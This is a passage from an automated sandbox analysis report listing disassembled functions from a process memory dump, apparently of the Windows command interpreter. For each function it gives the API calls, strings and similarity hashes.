                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmpwcschr$iswspace
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: KEYS$LIST$OFF
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3924973218-4129271751
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f049e7f3cfdf8937595ece472fcd58bea84cd867c04ab2a493efb127f1c20b1f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: caad9b28905e26ccfb50eed6f43eca095c47bb02e37988d76a08da9be2bc553d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f049e7f3cfdf8937595ece472fcd58bea84cd867c04ab2a493efb127f1c20b1f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7116A7220CB01DAE33F57189C4A9FB73ECFBC4721B64401EF50A860C0EEA94A81C696
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001DD98 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001DDA3
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0002C050), ref: 0001DDAD
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 0001DDD6
                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,00000001), ref: 0001DDE5
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 0001DDF0
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 0001DDF9
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 513048808-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6c61e6b608e52d2d66f95733ff0739f2cdace1f681cf1786435bc0b62675e97f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d626e4f5bef66cd8f5d888341ddca6ecbffdb0869b381913d0aa481b6fdc609d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c61e6b608e52d2d66f95733ff0739f2cdace1f681cf1786435bc0b62675e97f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0311CA739142549BE72147B8AE4D7FB3AECE747326F14031BE811D21E0D67D4D81D692
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00019A11 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00019A1C
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0001793A,00000104,?), ref: 00019A2B
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374,-00000001), ref: 00019A47
                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374), ref: 00019A56
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374), ref: 00019A61
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374,-00000001), ref: 00019A6A
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 513048808-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 242cb4fd61baf1350ddedfec6b85d7fcd7ad9737c0f5900642680349ec582409
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6ce99103cee08a824f83cc7ad45ff79f403f31b4b38eeea3abaadef586ebda49
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 242cb4fd61baf1350ddedfec6b85d7fcd7ad9737c0f5900642680349ec582409
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8101A2339041606B972147B89C5D9BB3AACDB87736B650325F826E30D0D9798C8981E3
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001DA30 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 219COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0002D954
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A70,000000FF,00000000,000425C2,000425C0,?,?,?,?,0001D980), ref: 0002D96D
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00002000,00000000,000425C2,000425C0,?,?,?,?,0001D980), ref: 0002D987
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A70,000000FF,000425C2,000425C0,?,?,?,?,0001D980), ref: 0002D9D3
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heaplongjmp$AllocProcessmemcpymemset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: 0123456789
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2034586978-2793719750
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 89e0c3f3ba1a76f118b4fb2fe642830587da9839098a18f8e7baecf57d83e7d5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f0e727ed7cc5f559b0ea216b04084129c8a1e8c89b6fc3cd5d5f67fc4ba6fcee
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89e0c3f3ba1a76f118b4fb2fe642830587da9839098a18f8e7baecf57d83e7d5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 727137B8B043129BDB24DF68DC856EE73B1EF81300F58406AEC4697384EB759D86CB95
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00015020 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00015074
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 0001515F
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BCA7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: iswspace.MSVCRT ref: 0001BD1D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD39
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD5D
                                                                                                                                                                                                                                                                                                                                                                                                                          • iswspace.MSVCRT ref: 00029289
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$iswspacememset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2220997661-3043279178
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6c90ebe6be66ec4095fb43418b3c55a93e0141da9e8d9df49202d6499d378877
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 98656f1bb7b2b7466b9df534ed3c964adb0afa9f67e23722f2d1eeec6f948f6f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c90ebe6be66ec4095fb43418b3c55a93e0141da9e8d9df49202d6499d378877
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E51E575A00222EBDB24DBA4DC426BFB3F5EF98310F14415DE849D7240EB349E81CB91
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000370D6 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 124memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 00037121
                                                                                                                                                                                                                                                                                                                                                                                                                          • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00037197
                                                                                                                                                                                                                                                                                                                                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 000371FF
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          • %WINDOWS_COPYRIGHT%, xrefs: 00037107
                                                                                                                                                                                                                                                                                                                                                                                                                          • Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 000370EE
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1103618819-4062316587
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 58b4e99dcbbfcc1ed01d9d17cddc498564ed42b1e17484cbbdcd37394fc2b9a1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6d437563426aab399ea86925274998561cf34248edde8702b21fd3da2a122d5f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58b4e99dcbbfcc1ed01d9d17cddc498564ed42b1e17484cbbdcd37394fc2b9a1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9141E676B0025587DF72CFACD8507BA73F9EF48740F680069E949EB350EA659D42C750
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00032584 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,?,00000000,001F0003,?,?,?,?), ref: 00032652
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00032670
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00032694
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$CreateSemaphore
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: _p0$wil
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4049970386-1814513734
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 44f5afbab4e70010b4496fa5d84e6a76c17e0f5d659f082d323df7b25cc1b3c6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 37e5f91888bb12c385fe58f21da8078013732456acfbcb33153bc169a83f1bd0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44f5afbab4e70010b4496fa5d84e6a76c17e0f5d659f082d323df7b25cc1b3c6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1131F375B4061A8BCB26DF34DD9AAEA73F8EF94310F1441A8E806D7291DF74DE408B60
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000351E8 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00035295
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002727B: __iob_func.MSVCRT ref: 00027280
                                                                                                                                                                                                                                                                                                                                                                                                                          • fprintf.MSVCRT ref: 00035215
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: __iob_func_wcsnicmpfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1828771275-2781220306
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8df4b7e24cb0dbf23fc3da3d74926325dea94194015efe49f46b1a1591e467d5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 624fbfb8b9b00be00138fcbc4018618ae2b89b596f6ca7eea02e921581531ca9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8df4b7e24cb0dbf23fc3da3d74926325dea94194015efe49f46b1a1591e467d5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0316D36F00611DBDB399BA89C46AEFB3F8EF95701F140429EC0AA3252FB705E41C694
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001B3C1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001AB7F: iswspace.MSVCRT ref: 0001AB8D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001AB7F: wcschr.MSVCRT ref: 0001AB9E
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0001B3FC
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0001B40E
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$iswspace
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: &<|>$+: $=,;
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3458554142-2256444845
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2222de8ea392840b37c9552719f9ff3f2c0a14bab8b545097051e36dcde762e5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e171a76b161d5f85fc913fc4614497fb6adca2a6f0b6224f8c36b1b5b8915031
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2222de8ea392840b37c9552719f9ff3f2c0a14bab8b545097051e36dcde762e5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2113632A04164A7D7349B26D441AFEB7E6EFA6754B28806AF8C097381F7358DD0D221
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00014D42 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 00014D66
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 00014D8A
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00014D95
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00014D5C
                                                                                                                                                                                                                                                                                                                                                                                                                          • UBR, xrefs: 00014D82
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3677997916-3870813718
